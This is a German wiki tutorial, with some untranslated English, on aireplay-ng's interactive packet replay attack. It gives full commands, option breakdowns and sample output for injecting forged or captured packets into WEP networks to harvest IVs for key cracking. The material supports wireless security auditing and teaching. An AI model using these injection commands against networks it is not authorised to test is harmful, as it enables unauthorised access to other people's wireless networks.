Interactive Packet Replay
Aus Wardriving-Forum.de Enzyklopädie
Inhaltsverzeichnis |
[Bearbeiten] Interactive Packet Replay
[Bearbeiten] Beschreibung
Diese Attacke ermöglicht es, ein beliebiges Paket zur Injection zu verwenden. Die Attacke bekommt ihre Pakete aus zwei verschiedenen Quellen. Die erste ist das Abhören der Pakete direkt von der WLAN-Karte. Die Zweite ist, dass man die Pakete aus einer .pcap - Datei ausliest (Standard Pcap-Format) (Packet Capture, verknüpft mit der pcap-Bibliothek http://www.tcpdump.org), dieses Format wird von den meisten Sniffern unterstützt. Das Auslesen der Pakete aus einer Datei ist eine oft verkannte Funktion von Aireplay. Dies hat den Vorteil, dass man Pakete aus beliebigen Sitzungen verwenden kann. A common use of reading a file containing a packet your created with packetforge-ng.
Damit die Interactive Paket-Replay funktioniert, müssen wir uns erst ein bisschen mit der Funktionsweise dieser Attacke beschäftigen. Du kannst nicht einfach irgendein Paket nehmen und mit diesem Injecten, es muss ein bestimmtes sein, damit die Attacke erfolgreich ist. Dies meint, dass der Access Point dieses Paket akzeptieren muss, damit er einen Initialisierungsvektor aussendet.
Damit er dies tut, brauchen wir ein natürliches Paket, oder ein verändertes, künstliches Paket. Wir werden uns nun diesen Vorgang näher ansehen.
Zuerst wollen wir uns ansehen, wie solch ein Paket überhaupt aussieht. Access Points werden die Pakete immer an die angegebene MAC-Adresse zurücksenden. Diese MAC sieht so aus: FF:FF:FF:FF:FF:FF. ARP Request-Pakete haben diese Charakteristik. Das Paket muss an einen PC in einem LAN-Netzwerk gehen. Bei diesem Paket "To DS" (To Distribution System)ist das Bit auf "1" gesetzt. Hier ist die Aufschlüsselung des aireplay-ng - Befehls:
* -b 00:14:6C:7E:40:80 :die MAC des Access Points. * -d FF:FF:FF:FF:FF:FF :wählt Pakete, die zu einem Client gesendet werden. * -t 1 : sortiert folgende Pakete aus :"To Distribution System" (Bit wird auf "1" gesetzt)
See "Natural Packet Replay" below for an example.
Als nächstes wollen wir uns die Pakete ansehen, die wir verändern müssen, damit sie von AP angenommen werden. Die Absicht dieses Vorganges ist, dass der AP so einen IV (Initialisierungsvektor) zurücksendet. Es ist genau so einfach, wie es sich anhört, du musst nur den Befehl "-t 1" einfügen, damit der AP das Paket an einen Rechner im LAN (Ethernet) sendet.
* -b 00:14:6C:7E:40:80 : die MAC des APs * -t 1 : sortiert folgende Pakete aus :"To Distribution System" (Bit wird auf "1" gesetzt)
Wir kümmern uns nicht um die Ziel-MAC-Adresse,denn in diesem Fall This because in this case we will modify the packet being injected. The following options will result in the packet looking like a "natural" packet above. Here are the options required:
* -p 0841 setzt das Frame Control Field, damit das Paket aussieht, als würde es von einem Client stammen. * -c FF:FF:FF:FF:FF:FF die Ziel MAC-Adresse
Siehe oben für ein Beispiel.
[Bearbeiten] Befehl
aireplay-ng -2 <Filteroptionen> <Replay-Optionen> -r <Dateiname> <Interface>
Aufschlüsselung:
* -2 : Interaktive Replay-Attacke * <Filteroptionen> sind hier beschrieben * <Replay-Optionen> sind hier beschrieben * -r <Dateiname> : eine .pcap - Datei * <Interface> die WLAN-Karte, z.B. ath0
[Bearbeiten] Beispiele
[Bearbeiten] Natural Packet Replay
Für dieses Beispiel benötigst du keine Fake-Authentication!
Befehl:
aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
Aufschlüsselung:
* -2 Interactive Replay * -b 00:14:6C:7E:40:80 deine MAC * -d FF:FF:FF:FF:FF:FF die Ziel-MAC des Clients * -t 1 selects packets with the "To Distribution System" flag set on * ath0 ist dein WLAN-Interface
Das Programm gibt folgendes aus:
Read 4 packets...
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:34:30:30
0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>
Use this packet ? y
Achtung! Unser Paket muss den obengenannten Kriterien entsprechen. Mit einem Druck auf "y" starten wir das injecten:
Saving chosen packet in replay_src-0315-191310.cap You should also start airodump-ng to capture replies. Sent 773 packets...
[Bearbeiten] Modified Packet Replay
Für dieses Beispiel musst du keine Fake Authentication machen, da die Quell-MAC bereits authentifiziert ist. Die Quell-MAC ist von einem anderen, bereits angemeldeten Client.
Befehl:
aireplay-ng -2 -b 00:14:6C:7E:40:80 -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 ath0
Aufschlüsselung:
* -2 : Interactive Replay * -b 00:14:6C:7E:40:80 : MAC des APs * -t 1 sortiert folgende Pakete aus :"To Distribution System" (Bit wird auf "1" gesetzt) * -c FF:FF:FF:FF:FF:FF die Ziel-MAC des Clients. * -p 0841 setzt das Frame Control Field, damit das Paket aussieht, als würde es von einem Client stammen. * ath0 ist das WLAN-Gerät.
Die Zahl der IVs pro Sekunde wird sich danach richten, wie groß das Paket ist. Je kleiner das Paket, desto mehr IVs bekommst du pro Sekunde. Dies sieht dann so aus:
Read 10 packets...
Size: 124, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:40:F4:77:E5:C9
Source MAC = 00:0F:B5:34:30:30
0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...
Use this packet ? y
Enter "y" and the program will continue:
Saving chosen packet in replay_src-0316-162802.cap You should also start airodump-ng to capture replies. Sent 2966 packets...
[Bearbeiten] Andere Beispiele
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Aufschlüsselung:
* -2 Interactive Replay Attacke * -p 0841 setzt das Frame Control Field, damit das Paket aussieht, als würde es von einem Client stammen. * -c FF:FF:FF:FF:FF:FF die Ziel-MAC des Clients. * -b 00:14:6C:7E:40:80 die MAC des APs. (ESSID) * -h 00:0F:B5:88:AC:82 die MAC deiner Wlan-Karte. * ath0 ist der Name deines WLAN-Geräts.
WICHTIG: In diesem Beispiel muss die MAC-Adresse deiner WLAN-Karte via Fake Authentication mit dem AP authentifiziert sein.
Die Zahl der IVs pro Sekunde wird sich danach richten, wie groß das Paket ist. Je kleiner das Paket, desto mehr IVs bekommst du pro Sekunde. Dies sieht dann so aus:
Read 99 packets...
Size: 139, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 01:00:5E:00:00:FB
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
0x0010: 0040 f477 e5c9 5065 917f 0000 e053 b683 .@.w..Pe....S..
0x0020: fff3 795e 19a3 3313 b62c c9f3 c373 ef3e ..y^..3..,...s.>
0x0030: 87a0 751a 7d20 9e6c 59af 4d53 16d8 773c ..u.} .lY.MS..w<
0x0040: af05 1021 8069 bbc8 06ea 59f3 3912 09a9 ...!.i....Y.9...
0x0050: c36d 1db5 a51e c627 11d1 d18c 2473 fae9 .m.....'....$s..
0x0060: 84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea ..z.......GcD.i.
0x0070: b65b df63 8893 279b 6ecf 1af8 c889 57f3 .[.c..'.n.....W.
0x0080: fea7 d663 21a6 3329 28c8 8f ...c!.3)(..
Use this packet ?
Responding "y" results in the packets being injected:
Saving chosen packet in replay_src-0303-103920.cap You should also start airodump-ng to capture replies. Sent 4772 packets...
Wenn du einen Größenfilter für Pakete verwendest, kannst du auch Attacke 2 verwenden. ARP Pakete von einem Drahtlosen Client sind normalerweise 68 oder 86 von einem LAN-Client Bytes groß:
aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF -h 00:0F:B5:88:AC:82 ath0
Aufschlüsselung:
* -2 Interactive Replay-Attacke * -p 0841 setzt das Frame Control Field, damit das Paket aussieht, als würde es von einem Client stammen. * -m 68 : minimale Paketlänge * -n 86 : maximale Paketlänge * -c FF:FF:FF:FF:FF:FF ist die Ziel-MAC des Clients. * -b 00:14:6C:7E:40:80 ist die MAC-Adresse des APs. * -h 00:0F:B5:88:AC:82 ist die MAC-Adresse deiner WLAN-Karte * ath0 ist der Name deiner WLAN-Karte
WICHTIG: In diesem Beispiel muss die MAC-Adresse deiner WLAN-Karte via Fake Authentication mit dem AP authentifiziert sein.
Das Programm gibt folgendes aus:
Read 145 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 9075 a09c 0000 d697 eb34 .@.w...u.......4
0x0020: e880 9a37 8bda d0e7 fdb4 252d d235 313c ...7......%-.51<
0x0030: 16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d ..xLZE.G.....&L.
0x0040: 7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43 }w./.p.kX....~C
0x0050: 78ed eeb3 6cc4 x...l.
Use this packet ? y
Achtung: Drücke nur auf "y", wenn das Paket 68 oder 86 Bytes lang ist!!! Sollte es das nicht sein, drücke auf "n":
Saving chosen packet in replay_src-0303-124624.cap You should also start airodump-ng to capture replies.
Wie vorher schon angesprochen, kann aireplay-ng seine Pakete auch aus einer .pcap-Datei auslesen. Es erstellt dann eine Datei mit einem ähnliche Dateinamen: "replay_src-0303-124624.cap". Du kannst .pcap-Dateien von jedem Programm, wie etwa Kismet, Airodump, etc. verwenden!
Hier ein Beispiel dazu:
aireplay-ng -2 -p 0841 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -r replay_src-0303-124624.cap ath0
Aufschlüsselung:
* -2 Interactive Replay-Attacke * -p 0841 setzt das Frame Control Field, damit das Paket aussieht, als würde es von einem Client stammen. * -b 00:14:6C:7E:40:80 ist die MAC-Adresse des APs. * -h 00:0F:B5:88:AC:82 ist die MAC-Adresse deiner WLAN-Karte * ath0 ist der Name deiner WLAN-Karte.
WICHTIG: In diesem Beispiel muss die MAC-Adresse deiner WLAN-Karte via Fake Authentication mit dem AP authentifiziert sein.
Das Programm antwortet:
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 9075 a09c 0000 d697 eb34 .@.w...u.......4
0x0020: e880 9a37 8bda d0e7 fdb4 252d d235 313c ...7......%-.51<
0x0030: 16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d ..xLZE.G.....&L.
0x0040: 7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43 }w./.p.kX....~C
0x0050: 78ed eeb3 6cc4 x...l.
Use this packet ? y
Wir drücken "y" und das Programm wird mit dem Injecten beginnen:
Saving chosen packet in replay_src-0303-124624.cap You should also start airodump-ng to capture replies. End of file.
[Bearbeiten] Tipps
[Bearbeiten] Weitere Interactive Anwendungsgebiete
Es gibt einige sehr interessante, andere Anwendungsgebiete für diese Attacke. Sie kann dazu benutzt werden, auch wenn kein Client online ist. Starte aireplay-ng mit den vorhergehenden Befelhlen, lehne dich zurück und warte auf ein Paket. Es ist egal, welches Paket dies ist. Einfach auf "y" drücken und das Programm generiert dir IVs!
Diese Form funktioniert auch bei angemeldeten Clients. Dort wird es etwas schneller gehen, da man nicht erst auf ein Paket warten muss.
WICHTIG: In diesem Beispiel muss die MAC-Adresse deiner WLAN-Karte via Fake Authentication mit dem AP authentifiziert sein.
[Bearbeiten] Injecting Management Frames
Du kannst auch Filter für Frames einfügen. Dies funktioniert folgenermaßen:
Beispiele:
* Wenn du -v 8 -u 0 -w 0 setzt, kannst du Beacon Frames setzen. * Wenn du -v 12 -u 1 -w 0 -m 10 -n 2000 setzt, kannst du Filter für Beacon-Frames setzen.
[Bearbeiten] Troubleshooting
Das meist verbreitetste Problem ist, dass du nicht mit dem AP assoziiert bist. Du kannst entweder eine schon assoziierte MAC verwenden oder deine via fake authenticationassoziieren.
Siehe auch I am injecting but the ivs don't increase tutorial.
Siehe auch http://tinyshell.be/aircrackng/forum/index.php?topic=194
Aireplay-ng Troubleshooting: aireplay-ng usage troubleshooting.
